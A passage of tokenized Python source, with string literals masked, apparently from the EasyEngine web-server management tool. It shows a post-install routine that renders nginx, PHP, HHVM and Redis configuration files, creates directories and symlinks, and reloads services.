<EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_redis_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add_key ( self , '<STR_LIT>' ) <EOL> else : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , ppa = EEVariables . ee_redis_repo ) <EOL> @ expose ( hide = True ) <EOL> def post_pref ( self , apt_packages , packages ) : <EOL> """<STR_LIT>""" <EOL> if len ( apt_packages ) : <EOL> if set ( EEVariables . ee_postfix ) . issubset ( set ( apt_packages ) ) : <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , <EOL> msg = "<STR_LIT>" ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if set ( EEVariables . ee_nginx ) . issubset ( set ( apt_packages ) ) or set ( EEVariables . ee_nginx_dev ) . issubset ( set ( apt_packages ) ) : <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> if not EEFileUtils . grep ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> with open ( '<STR_LIT>' , encoding = '<STR_LIT:utf-8>' , <EOL> mode = '<STR_LIT:a>' ) as ee_nginx : <EOL> ee_nginx . write ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> http2 = "<STR_LIT>" if EEAptGet . is_installed ( self , '<STR_LIT>' ) else "<STR_LIT>" <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" . format ( http2 = http2 ) ) : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" . format ( http2 ) ) <EOL> sites = getAllsites ( self ) <EOL> if sites : <EOL> for site in sites : <EOL> site_name = site . sitename <EOL> siteinfo = getSiteInfo ( self , site_name ) <EOL> ssl = ( "<STR_LIT>" if siteinfo . is_ssl else "<STR_LIT>" ) <EOL> if ( ssl == "<STR_LIT>" ) : <EOL> if os . path . isfile ( '<STR_LIT>' . format ( site_name ) ) : <EOL> http2 = ( "<STR_LIT>" if EEAptGet . is_installed ( self , '<STR_LIT>' ) else "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" . format ( http2 = http2 , site = site_name ) ) : <EOL> Log . debug ( self , '<STR_LIT>' . format ( site_name ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" . format ( http2 = http2 , site = site_name ) ) <EOL> if not ( os . path . isfile ( '<STR_LIT>' ) ) : <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_version ) ) <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> data = dict ( php = "<STR_LIT>" , debug = "<STR_LIT>" , hhvm = "<STR_LIT>" , php7 = "<STR_LIT>" , debug7 = "<STR_LIT>" , <EOL> hhvmconf = False , php7conf = True if EEAptGet . is_installed ( self , '<STR_LIT>' ) else False ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> http2 = ( "<STR_LIT>" if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) else "<STR_LIT>" ) <EOL> data = dict ( webroot = EEVariables . ee_webroot , http2 = http2 ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , <EOL> "<STR_LIT>" "<STR_LIT>" ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> passwd = '<STR_LIT>' . join ( [ random . choice <EOL> ( string . ascii_letters + string . digits ) <EOL> for n in range ( <NUM_LIT:6> ) ] ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( password = passwd ) ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . mvfile ( self , "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> EEGit . add ( self , <EOL> [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> data [ '<STR_LIT:version>' ] = EEVariables . ee_version <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> print ( "<STR_LIT>" <EOL> + "<STR_LIT>" . format ( passwd ) ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> else : <EOL> self . msg = ( self . msg + [ "<STR_LIT>" ] <EOL> + [ "<STR_LIT>" . format ( passwd ) ] ) <EOL> else : <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if not EEFileUtils . grep ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" , <EOL> "<STR_LIT:a>" ) as redis_file : <EOL> redis_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:a>" ) as redis_file : <EOL> redis_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . app . pargs . php7 : <EOL> if os . path . isdir ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isdir ( "<STR_LIT>" ) and ( not os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if not EEFileUtils . grep ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:a>" ) as php_file : <EOL> php_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if self . app . pargs . pagespeed : <EOL> if ( os . path . isfile ( '<STR_LIT>' ) and <EOL> ( not os . path . isfile ( '<STR_LIT>' ) ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if set ( EEVariables . ee_hhvm ) . issubset ( set ( apt_packages ) ) : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> with open ( "<STR_LIT>" , "<STR_LIT:a>" ) as hhvm_file : <EOL> hhvm_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> with open ( "<STR_LIT>" , "<STR_LIT:a>" ) as hhvm_file : <EOL> hhvm_file . write ( "<STR_LIT>" ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if not EEFileUtils . grep ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" , <EOL> "<STR_LIT:a>" ) as hhvm_file : <EOL> hhvm_file . write ( "<STR_LIT>" ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if not EEFileUtils . grep ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" , <EOL> "<STR_LIT:a>" ) as hhvm_file : <EOL> hhvm_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT:\n>" ) <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if not EEService . reload_service ( self , '<STR_LIT>' ) : <EOL> Log . error ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if set ( EEVariables . ee_redis ) . issubset ( set ( apt_packages ) ) : <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . isfile ( "<STR_LIT>" ) : <EOL> if not EEFileUtils . grep ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) : <EOL> with open ( "<STR_LIT>" , <EOL> "<STR_LIT:a>" ) as redis_file : <EOL> redis_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> with open ( "<STR_LIT>" , "<STR_LIT:a>" ) as redis_file : <EOL> redis_file . write ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_codename != '<STR_LIT>' and set ( EEVariables . ee_php ) . issubset ( set ( apt_packages ) ) : <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> if ( EEVariables . ee_platform_distro == "<STR_LIT>" and <EOL> EEVariables . ee_platform_codename == '<STR_LIT>' ) : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" ) <EOL> with open ( "<STR_LIT>" , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:a>' ) as myfile : <EOL> myfile . write ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . create_symlink ( self , [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] ) <EOL> config = configparser . ConfigParser ( ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> config . read ( '<STR_LIT>' ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = EEVariables . ee_timezone <EOL> with open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> '''<STR_LIT>''' <EOL> data = dict ( pid = "<STR_LIT>" , error_log = "<STR_LIT>" , <EOL> include = "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> ee_php_fpm = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_php_fpm ) <EOL> ee_php_fpm . close ( ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read_file ( codecs . open ( '<STR_LIT>' , <EOL> "<STR_LIT:r>" , "<STR_LIT:utf8>" ) ) <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT:100>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> config [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> with codecs . open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) as configfile : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> config . write ( configfile ) <EOL> EEFileUtils . copyfile ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" <EOL> "<STR_LIT>" , 